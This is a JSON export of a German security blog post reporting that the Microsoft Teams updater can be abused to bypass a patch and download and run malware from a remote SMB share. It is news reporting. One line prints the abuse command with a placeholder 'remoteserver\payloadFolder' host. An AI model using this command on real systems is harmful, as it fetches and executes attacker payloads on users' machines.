{"id":234235,"date":"2020-08-07T01:03:09","date_gmt":"2020-08-06T23:03:09","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=234235"},"modified":"2020-08-07T05:34:06","modified_gmt":"2020-08-07T03:34:06","slug":"malware-kann-microsoft-teams-updater-missbrauchen","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2020\/08\/07\/malware-kann-microsoft-teams-updater-missbrauchen\/","title":{"rendered":"Malware kann Microsoft Teams Updater missbrauchen"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" height=\"47\" align=\"left\" \/>[<a href=\"https:\/\/borncity.com\/win\/2020\/08\/07\/malware-kann-microsoft-teams-updater-missbrauchen\/\" target=\"_blank\" rel=\"noopener noreferrer\">English<\/a>]Der Updater von Microsoft Teams kann von Hackern als Living off the Land-Binary (LoLBin) missbraucht werden, um Malware remote auf dem System des Anwenders zu installieren. Bem\u00fchungen von Microsoft, diese Schwachstelle zu eliminieren, funktionieren zwar bis zu einem gewissen Grad,\u00a0 k\u00f6nnen Angreifer letztendlich aber nicht davon abhalten, Teams zu missbrauchen, um ihre Malware zu platzieren und auszuf\u00fchren.<\/p>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg05.met.vgwort.de\/na\/eace73f69109421688ef61b87890a284\" alt=\"\" width=\"1\" height=\"1\" \/>Ich bin gleich \u00fcber zwei Stellen auf dieses Thema gesto\u00dfen. Einmal hat Bleeping Computer das in <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/hackers-can-abuse-microsoft-teams-updater-to-install-malware\/\" target=\"_blank\" rel=\"noopener noreferrer\">diesem Artikel<\/a> aufbereitet. Zudem hat jemand, der eine Schwachstelle gefunden hat, das auf Twitter bekannt gegeben.<\/p>\n<blockquote class=\"twitter-tweet\">\n<p dir=\"ltr\" lang=\"en\">Microsoft Teams &#8211; Arbitrary code execution <a href=\"https:\/\/twitter.com\/hashtag\/lolbin?src=hash&amp;ref_src=twsrc%5Etfw\">#lolbin<\/a><a href=\"https:\/\/t.co\/XOFON9Gdzn\">https:\/\/t.co\/XOFON9Gdzn<\/a><a href=\"https:\/\/twitter.com\/hashtag\/threathunt?src=hash&amp;ref_src=twsrc%5Etfw\">#threathunt<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/dfir?src=hash&amp;ref_src=twsrc%5Etfw\">#dfir<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/blueteam?src=hash&amp;ref_src=twsrc%5Etfw\">#blueteam<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/redteam?src=hash&amp;ref_src=twsrc%5Etfw\">#redteam<\/a> <a href=\"https:\/\/t.co\/4d4FY2zf89\">pic.twitter.com\/4d4FY2zf89<\/a><\/p>\n<p>\u2014 Reegun J (@reegun21) <a href=\"https:\/\/twitter.com\/reegun21\/status\/1291005287034281990?ref_src=twsrc%5Etfw\">August 5, 2020<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>Laut Bleeping Computer war bereits vor einem Jahr eine Schwachstelle in Microsoft Teams entdeckt und <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-teams-can-be-used-to-download-and-run-malicious-packages\/\" target=\"_blank\" rel=\"noopener noreferrer\">beschrieben worden<\/a>. Der Update-Mechanismus, wie er seinerzeit in der Teams Desktop-Anwendung von Microsoft Teams implementiert ist, erm\u00f6glicht das Herunterladen und Ausf\u00fchren beliebiger Dateien auf dem System. Reegun Jayapaul, jetzt Lead Threat Architect f\u00fcr SpiderLabs bei Trustwave, hatte das Problem ebenfalls 2019 gefunden und technische Details ver\u00f6ffentlicht. Microsoft hat dann einen Patch bereitgestellt, der die Ausnutzbarkeit dieser Schwachstelle beseitigen sollte.<\/p>\n<h2>Angriff als Variante m\u00f6glich<\/h2>\n<p>Jetzt hat Sicherheitsforscher <a href=\"https:\/\/twitter.com\/reegun21\" target=\"_blank\" rel=\"noopener noreferrer\">Reegun Richard<\/a>, die in obigem Tweet erw\u00e4hnte Schwachstelle entdeckt. Der Patch, der zuvor den Teams zur Verf\u00fcgung gestellt wurde, sollte die M\u00f6glichkeit der Aktualisierung \u00fcber eine URL einschr\u00e4nken. Der Updater erlaubt aber weiterhin lokale Verbindungen \u00fcber eine Freigabe oder einen lokalen Ordner f\u00fcr Produktaktualisierungen. Als der Sicherheitsforscher diesen Befund beobachtete, stellte er jedoch fest, dass die durch den Patch hinzugef\u00fcgten Einschr\u00e4nkungen leicht umgangen werden k\u00f6nnten, indem man auf eine entfernte SMB-Freigabe verweist. Hier ist ein Befehl:<\/p>\n<pre><code>Update.exe --update=\\\\remoteserver\\payloadFolder<\/code><\/pre>\n<p>der eine Malware von einem Remote-Server holen und per Update ausf\u00fchren lassen kann. Reegun schreibt dazu, dass die Schwachstelle es einem b\u00f6swilligen Akteur erlaubte, den MS Teams Updater zu benutzen, um jede beliebige Bin\u00e4rdatei oder Nutzlast herunterzuladen. Diese Technik wird in der Regel als \"<a href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener noreferrer\">Living Off the Land<\/a>\" bezeichnet und ist besonders gef\u00e4hrlich, da sie bekannte, g\u00e4ngige Software zum Herunterladen von Malware verwendet.<\/p>\n<p>Details lassen sich den beiden verlinkten Artikeln entnehmen. Generell ist mir Teams sicherheitstechnisch nicht geheuer, da weitere B\u00f6cke in der Software schlummern. Ich hatte im Blog-Beitrag <a href=\"https:\/\/borncity.com\/blog\/2020\/01\/19\/microsoft-teams-und-die-sicherheit\/\">Microsoft Teams und die Sicherheit \u2026<\/a> schon mal darauf hingewiesen &#8211; habe aber nicht mehr verfolgt, was dann bei Microsoft in Sachen Absicherung von Teams passiert ist.<\/p>\n<p><strong>\u00c4hnliche Artikel:<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/04\/27\/microsoft-teams-schwachstelle-erlaubte-kontenbernahme\/\">Microsoft Teams: Schwachstelle erlaubte Konten\u00fcbernahme<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/01\/19\/microsoft-teams-und-die-sicherheit\/\">Microsoft Teams und die Sicherheit \u2026<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/04\/02\/verursacht-windows-10-vpn-bug-fix-update-teams-probleme\/\">Verursacht Windows 10 VPN-Bug-Fix Update Teams-Probleme?<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/04\/24\/ms-teams-bug-verhindert-whiteboard-nutzung-in-europa\/\">MS Teams: Bug verhindert Whiteboard-Nutzung in Europa<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/05\/05\/ms-teams-bei-windows-server-auf-virtuellen-speicher-achten\/\">MS-Teams: Bei Windows Server auf virtuellen Speicher achten<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/05\/19\/microsoft-mahnt-berliner-datenschutzbeauftragten-ab\/\">Microsoft 'mahnt' Berliner Datenschutzbeauftragte ab<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2020\/07\/10\/zoom-teams-nicht-dsgvo-konform-einsetzbar\/\">Zoom &amp; Teams nicht DSGVO-konform einsetzbar<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[English]Der Updater von Microsoft Teams kann von Hackern als Living off the Land-Binary (LoLBin) missbraucht werden, um Malware remote auf dem System des Anwenders zu installieren. Bem\u00fchungen von Microsoft, diese Schwachstelle zu eliminieren, funktionieren zwar bis zu einem gewissen Grad,\u00a0 &hellip; <a href=\"https:\/\/borncity.com\/blog\/2020\/08\/07\/malware-kann-microsoft-teams-updater-missbrauchen\/\">Weiterlesen <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4328,5595],"class_list":["post-234235","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-sicherheit","tag-teams"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/234235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=234235"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/234235\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=234235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=234235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=234235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}